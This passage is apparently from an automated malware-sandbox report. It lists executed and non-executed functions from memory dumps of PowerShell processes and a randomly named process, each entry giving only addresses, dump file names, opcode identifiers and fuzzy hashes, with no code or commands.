                                                                              • Snapshot File: hcaresult_27_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 34e6055833aa3effdb610ff3cecaf957db59435724befa243b884dbb17eaad28
                                                                              • Instruction ID: 9ebc2ec176619536d990ca9507b920f767a87013c6c5a578f6f279c19f3d2233
                                                                              • Opcode Fuzzy Hash: 34e6055833aa3effdb610ff3cecaf957db59435724befa243b884dbb17eaad28
                                                                              • Instruction Fuzzy Hash: C4412931D0DB888FDB199B1CA8062A9BFE1FB55710F54416FD04983696DB34AC168BC2
                                                                              Function 00007FF848DFEF00 Relevance: .1, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3495814709.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848dfd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1f86a434e0dd699ce0d0ec5dc673f3184ac15eec541a142f54bb5f9611cfdcfe
                                                                              • Instruction ID: 4b822be9307915616313b636b9308d5a54006d04238cc0efa3a1c2bfcd9abaf4
                                                                              • Opcode Fuzzy Hash: 1f86a434e0dd699ce0d0ec5dc673f3184ac15eec541a142f54bb5f9611cfdcfe
                                                                              • Instruction Fuzzy Hash: 0D41F67180EBC44FE7569B289855A523FF0EF57360B1901DFD088CF1A3DB25A84AC7A2
                                                                              Function 00007FF848F1A778 Relevance: .1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3513772351.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c87b66ba0d2e4648e62368c3d18abdbc99740fd01d7245e22aecc9d67da0bbb4
                                                                              • Instruction ID: f99a814d3e4f0f05210dea8772ddf763c4c9e8a4ede47522fe059f9b063f20db
                                                                              • Opcode Fuzzy Hash: c87b66ba0d2e4648e62368c3d18abdbc99740fd01d7245e22aecc9d67da0bbb4
                                                                              • Instruction Fuzzy Hash: E521C23190CB4C8FDB58DFACD84A7EA7BE0EB96321F04416FD449C3152D674A856CB91
                                                                              Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3513772351.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                              Function 00007FF848F19CF8 Relevance: .0, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3513772351.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8189bca01d9cbfae4054be8bc405492882ff7137a649e5acf925b01677257558
                                                                              • Instruction ID: 5eb059ed6d9443675e2291c9f651cf90a7b5e64ba2f5f772542ad1c08717d1e8
                                                                              • Opcode Fuzzy Hash: 8189bca01d9cbfae4054be8bc405492882ff7137a649e5acf925b01677257558
                                                                              • Instruction Fuzzy Hash: C3F0B43180C6894FDB46EF2888595D57FA0EF26350F0402DBE458C70A2DB659858CBC2

                                                                              Non-executed Functions

                                                                              Function 00007FF848F18BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001B.00000002.3513772351.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_27_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                              • API String ID: 0-4116931533
                                                                              • Opcode ID: a581e4c6c5113e6124640178bdd208b2461793510d871b394d61c6a67f83a4b8
                                                                              • Instruction ID: 58a37288408cec2b7841e32effd1dac45db3f07ecb65aa4a0ef07aed3610af80
                                                                              • Opcode Fuzzy Hash: a581e4c6c5113e6124640178bdd208b2461793510d871b394d61c6a67f83a4b8
                                                                              • Instruction Fuzzy Hash: 1B21027771A426AFD30277EDBC105D97790EB942BAB4802B3D358CF503DA18608B87E9

                                                                              Executed Functions

                                                                              Function 00007FF848FE660A Relevance: 6.7, Strings: 5, Instructions: 424COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3533897585.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B"I$(B"I$(B"I$(B"I$(B"I
                                                                              • API String ID: 0-3570690463
                                                                              • Opcode ID: 00924d6bb818622e12b8b26dd8819e407c55633ab6c5f23db27b6384e76e1565
                                                                              • Instruction ID: da4cb76101459d78e9b105fdffbb9d3a421cb63cb5a808b36bf5bb093c7b2fea
                                                                              • Opcode Fuzzy Hash: 00924d6bb818622e12b8b26dd8819e407c55633ab6c5f23db27b6384e76e1565
                                                                              • Instruction Fuzzy Hash: EBC12231D1EA8E5FEB99EB2858595B9BBE1EF15390F1801BAD00DCB0D3EA1CAC05C355
                                                                              Function 00007FF848FE664D Relevance: 5.2, Strings: 4, Instructions: 246COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3533897585.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B"I$(B"I$(B"I$(B"I
                                                                              • API String ID: 0-3582805445
                                                                              • Opcode ID: 218553751aaf86d62c4e36b786acb652d600004e8fd469230e88bbcff39b626e
                                                                              • Instruction ID: 09c687db647e0b6ca992f77f2b4a291d417710c99c038c67d4959afdb786349e
                                                                              • Opcode Fuzzy Hash: 218553751aaf86d62c4e36b786acb652d600004e8fd469230e88bbcff39b626e
                                                                              • Instruction Fuzzy Hash: F771EF31D1EA8E9FEBA9EB2858645747BE1EF15790F1801BAD00DCB1C3EA1CAC05C345
                                                                              Function 00007FF848FE4073 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3533897585.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>"I
                                                                              • API String ID: 0-2459728092
                                                                              • Opcode ID: 73421701cb81669992a1a6f4e3a4baecdfa4fbd61e492d462af324eaaeedc611
                                                                              • Instruction ID: be234d45479558eba07d6329544202813222e02519685b8fc61e69121db0fdd3
                                                                              • Opcode Fuzzy Hash: 73421701cb81669992a1a6f4e3a4baecdfa4fbd61e492d462af324eaaeedc611
                                                                              • Instruction Fuzzy Hash: 6751B232A0DE8A4FEB9AAB2C941167577D2FFA5660F1801BEC14EC71D2DE1CE8058249
                                                                              Function 00007FF848FE4370 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3533897585.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>"I
                                                                              • API String ID: 0-3426486286
                                                                              • Opcode ID: 4e843d34f5c394d31cceb7ad22262ddbd2160f3186480df953b49c466d7f2e42
                                                                              • Instruction ID: c8dcd69625350c5e90528ac58c1a898dbdcd04b3ff0ad0ea99f03a3b25df813b
                                                                              • Opcode Fuzzy Hash: 4e843d34f5c394d31cceb7ad22262ddbd2160f3186480df953b49c466d7f2e42
                                                                              • Instruction Fuzzy Hash: 40410332E0DE494FE7A9EB2864116B57BE1EF64660F0801BEC54EC75C7EB1CAC118395
                                                                              Function 00007FF848DFED40 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3507945077.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848dfd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0_
                                                                              • API String ID: 0-39517750
                                                                              • Opcode ID: 982ad8eb7ce09235ddc69d728a33d61f0a4878d028e63f85396e954b708052d4
                                                                              • Instruction ID: f18175d886280b06f11be10c6160988afc26bfbfc8b5e067c0e9d57cb6d2c0f7
                                                                              • Opcode Fuzzy Hash: 982ad8eb7ce09235ddc69d728a33d61f0a4878d028e63f85396e954b708052d4
                                                                              • Instruction Fuzzy Hash: DE41F67180EBC44FE7569B289C55A523FF0EF57260B1906DFD088CB1A3D725A849C7A2
                                                                              Function 00007FF848FE40BF Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3533897585.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>"I
                                                                              • API String ID: 0-2459728092
                                                                              • Opcode ID: 7969db6cf47d84f51a7c898a661b3296e790229f9c6280c56235a245b412618c
                                                                              • Instruction ID: f03e99d224511df892dee4f9a6f6af105b874f23fe69bc7ac8e4758f6e162e19
                                                                              • Opcode Fuzzy Hash: 7969db6cf47d84f51a7c898a661b3296e790229f9c6280c56235a245b412618c
                                                                              • Instruction Fuzzy Hash: 3121AE32D0DE864FEBAAEB28985117466D2FF74690F5901BEC11EC71E2DF2C9C058249
                                                                              Function 00007FF848FE43BC Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3533897585.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>"I
                                                                              • API String ID: 0-3426486286
                                                                              • Opcode ID: 40467b8501a7ea4b8d8fd09580b8a5e2b679a20df38465778c36a6495b1507c3
                                                                              • Instruction ID: 7cde23068cec17c799365b944c5d4e82cc2bbf75b2ff58024c539e9da85b4420
                                                                              • Opcode Fuzzy Hash: 40467b8501a7ea4b8d8fd09580b8a5e2b679a20df38465778c36a6495b1507c3
                                                                              • Instruction Fuzzy Hash: E811C232E0EA854FE7A4EB2898545B87BD1FF606A0F4901BED45DC75D2DB1CAC108395
                                                                              Function 00007FF848F1A0FB Relevance: .3, Instructions: 252COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3520561928.00007FF848F15000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F15000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848f15000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0b3a87bc9f01176c9aec1369d70550c895289f675ed09f82ab0bec64b0ad70ac
                                                                              • Instruction ID: f9c64d8b98d1ccc48833c0efdca282b3c2f998cfe5d41d501473450070e5619f
                                                                              • Opcode Fuzzy Hash: 0b3a87bc9f01176c9aec1369d70550c895289f675ed09f82ab0bec64b0ad70ac
                                                                              • Instruction Fuzzy Hash: 4711487690EBC90FC717DB385C68594BFB0EE53254B1A02EBD0D8CB0E3D6154849CBA2
                                                                              Function 00007FF848F19798 Relevance: .1, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3520561928.00007FF848F15000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F15000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848f15000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3f88ae218a960e84434ee3a1f440cfc5c4bfc2e462604d64d39dd617bda9c25a
                                                                              • Instruction ID: 60f5ed59b0a9f4c22393998713a5f63bd1f854ab52d56f9aabb25b8a755e4283
                                                                              • Opcode Fuzzy Hash: 3f88ae218a960e84434ee3a1f440cfc5c4bfc2e462604d64d39dd617bda9c25a
                                                                              • Instruction Fuzzy Hash: 3531B43191CB4C9FDB1CDB5CA8466A97BE0FB98721F00422FE44993652DB70A855CBC6
                                                                              Function 00007FF848F1A64C Relevance: .1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3520561928.00007FF848F15000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F15000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848f15000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fb721d1d9b5898127e12ef29246979beca40bdcf631a87d1d468a0a029853af2
                                                                              • Instruction ID: e859d4a3c29fa606796b6394d88ddb916c77a296149eb891989ef4b69e7a775b
                                                                              • Opcode Fuzzy Hash: fb721d1d9b5898127e12ef29246979beca40bdcf631a87d1d468a0a029853af2
                                                                              • Instruction Fuzzy Hash: 4B21473090CB8C4FDB59DB6C8C4A6E67BE0EB97331F04426FD048C3192DA649856CB92
                                                                              Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3520561928.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

                                                                              Non-executed Functions

                                                                              Function 00007FF848F184E5 Relevance: 6.4, Strings: 5, Instructions: 118COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000001D.00000002.3520561928.00007FF848F15000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F15000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_29_2_7ff848f15000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: N_^$N_^$N_^$N_^$N_^
                                                                              • API String ID: 0-2528851458
                                                                              • Opcode ID: 24e214708d320bd250d5d4dc3f0ab0c87eddc4417e1a3f5eee155ec499ca79cf
                                                                              • Instruction ID: 408635a83523c96ed1b12ce88b180d572533c4255e5c89c439457fd095c03fc4
                                                                              • Opcode Fuzzy Hash: 24e214708d320bd250d5d4dc3f0ab0c87eddc4417e1a3f5eee155ec499ca79cf
                                                                              • Instruction Fuzzy Hash: DB31D677E1DAD24FE36A47686C760E42F90EF61BB5B5A00F6C14C8B0C3EF146C065246

                                                                              Executed Functions

                                                                              Function 00007FF848F117A2 Relevance: .5, Instructions: 477COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5de3843014d6061f8c0b1d2f6131c4df37bb8e5c80a6aeef412deb24e45a43ce
                                                                              • Instruction ID: d78bc7da40b4ebb5653039f667045bd462fd9365430d1cc968544c4797a9c962
                                                                              • Opcode Fuzzy Hash: 5de3843014d6061f8c0b1d2f6131c4df37bb8e5c80a6aeef412deb24e45a43ce
                                                                              • Instruction Fuzzy Hash: 46E1D172D0EAD69FE345AB6CA8651EA3BA0FF52765F0801B6C048CB1D3DF186C858359
                                                                              Function 00007FF848F10A19 Relevance: .3, Instructions: 283COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 90f0a4c66eecaedb5c6be6954b1fe4baeb225207351c673a4f78a34b192e7bab
                                                                              • Instruction ID: a74f2403c153966277cea340a7913ea52fddded61b677e1587052bda0679e255
                                                                              • Opcode Fuzzy Hash: 90f0a4c66eecaedb5c6be6954b1fe4baeb225207351c673a4f78a34b192e7bab
                                                                              • Instruction Fuzzy Hash: 9A71F125A1DA5A0EE359BA3C58552B976C2EBC9790F25027DE8DFC32C3DE1CAC074249
                                                                              Function 00007FF848F11A0D Relevance: .2, Instructions: 227COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ffc0b45938571bb423983d284184d267c0bb18a801030120d26d6d006479e3d4
                                                                              • Instruction ID: 523709366a863a98358adfc0b0e0c018170c08da32328f01a69c3c7b1e3db6cc
                                                                              • Opcode Fuzzy Hash: ffc0b45938571bb423983d284184d267c0bb18a801030120d26d6d006479e3d4
                                                                              • Instruction Fuzzy Hash: 8671C072D0DA9A9FE745EB7898692EA7FE0FF12354F0801BAC048DB1D3DF2918458355
                                                                              Function 00007FF848F1083D Relevance: .2, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0656dbdda7777cf7da771846139b8a782a751581f6061d9b78f699fbaeb8b9ed
                                                                              • Instruction ID: 20b19255165bace41f81f7212306d010f5229d1cbdd6c4e5b29796c668a9bd8a
                                                                              • Opcode Fuzzy Hash: 0656dbdda7777cf7da771846139b8a782a751581f6061d9b78f699fbaeb8b9ed
                                                                              • Instruction Fuzzy Hash: 3E512632E1CA688FE754FB3C84996BA7BE1FF88355F45017AE44AC7292DF249C418741
                                                                              Function 00007FF848F11C45 Relevance: .1, Instructions: 124COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8a54e5855f36d87a0a80c2d2a08bef0f29048e24ead6691677ac6d276a0dc553
                                                                              • Instruction ID: 02edfaedf8327bc3aae401b1ee8c934dce55a47598be12bc81c4e6185f9b211c
                                                                              • Opcode Fuzzy Hash: 8a54e5855f36d87a0a80c2d2a08bef0f29048e24ead6691677ac6d276a0dc553
                                                                              • Instruction Fuzzy Hash: 30418875A09A8A8FE788DF28D4683EA7FE0EB55345F50017AC009D73E6DBBE1849C744
                                                                              Function 00007FF848F1155D Relevance: .1, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 22658c9dd6c4a7388c88209cd7f2a07db7429fff209e65230b21d1c230b04e9c
                                                                              • Instruction ID: 32ff9380bee3ccd54d1be2fd664d800ec763d2a4eddcb20ba1bc7674b7af9e1d
                                                                              • Opcode Fuzzy Hash: 22658c9dd6c4a7388c88209cd7f2a07db7429fff209e65230b21d1c230b04e9c
                                                                              • Instruction Fuzzy Hash: 7531DF36A0D68A9FE702FB7898152D9BBB0EF81361F1841B7C144CB1C3EB385989C765
                                                                              Function 00007FF848F112E8 Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a56cb35481e6a837f1be76fc41a42e4ad26bb479f47bb5ff3abc2a9bc1ddb1ac
                                                                              • Instruction ID: 7d15f9895c882348e609700bbc19ba444116fcd1a5f6df48880e4b5e6f23f08b
                                                                              • Opcode Fuzzy Hash: a56cb35481e6a837f1be76fc41a42e4ad26bb479f47bb5ff3abc2a9bc1ddb1ac
                                                                              • Instruction Fuzzy Hash: B721F231B2CA994FE788F72C945D77A76C2EB983A1F4400B9E40EC32D7DE18AC418385
                                                                              Function 00007FF848F10CB9 Relevance: .1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6dcf30ec9daa41a598cdf6d31f6193b7e8781ccfd78fd50d5f7736859e4b5df0
                                                                              • Instruction ID: db042a5b452cd5b7d775b837a5b6363a8616ce4c2ad45cd5899cac7bee09fabd
                                                                              • Opcode Fuzzy Hash: 6dcf30ec9daa41a598cdf6d31f6193b7e8781ccfd78fd50d5f7736859e4b5df0
                                                                              • Instruction Fuzzy Hash: 96216571A0D7660AE379762C6C512757FE1EFC5380F18057AE89AC26C3EE0DAC055398
                                                                              Function 00007FF848F10868 Relevance: .1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 56a64ce7d00f603432fa7ce4ca15e1795a2574f8b52c26701a3f68333c71ba07
                                                                              • Instruction ID: 3eb65300c3d29ad5051b2269ab11d2881f326a8b168c659cf9cef19f699c30c2
                                                                              • Opcode Fuzzy Hash: 56a64ce7d00f603432fa7ce4ca15e1795a2574f8b52c26701a3f68333c71ba07
                                                                              • Instruction Fuzzy Hash: E911233295C7984FD761FB2888591EB7BE0FB89325F10063FE88AC3281DB3099018782
                                                                              Function 00007FF848F11588 Relevance: .1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9e8c86dbe5af4b180198a2e19cbcc7583a7cf67a057bd201cac76648450a3930
                                                                              • Instruction ID: b5713e87f7dea81b3a9bfeb21773a978f4cc49df17cc566f33ebd17846bd95af
                                                                              • Opcode Fuzzy Hash: 9e8c86dbe5af4b180198a2e19cbcc7583a7cf67a057bd201cac76648450a3930
                                                                              • Instruction Fuzzy Hash: 8B11AC35A0D6898FE702FB78D854198BBB0EF81321F1846B7C084DB2D3E6385A898755
                                                                              Function 00007FF848F11E1D Relevance: .1, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 18e2b93bbcb041bf200a9a34e138b0455519527feeb0935eb451229a28e14e6f
                                                                              • Instruction ID: 10218342bf4efef0d7bd99edda97532c8f94364b0cc8fa4f2eed4d64f729f06e
                                                                              • Opcode Fuzzy Hash: 18e2b93bbcb041bf200a9a34e138b0455519527feeb0935eb451229a28e14e6f
                                                                              • Instruction Fuzzy Hash: 4901263088E6D61FD35AA7B49C215A23FE0DF87650B0901FBD086CB5E3C94D2C82C361
                                                                              Function 00007FF848F11590 Relevance: .1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.2989634611.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_7ff848f10000_GFIYCbjKVID.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 53d8a7907b12187ac75fc34f0faa1345ebdc4e08b5c9f87522754587964fa19a
                                                                              • Instruction ID: 15fa4fa78b3a7f63855188307236fafb0be09072e6c4e08116723d294adfa008
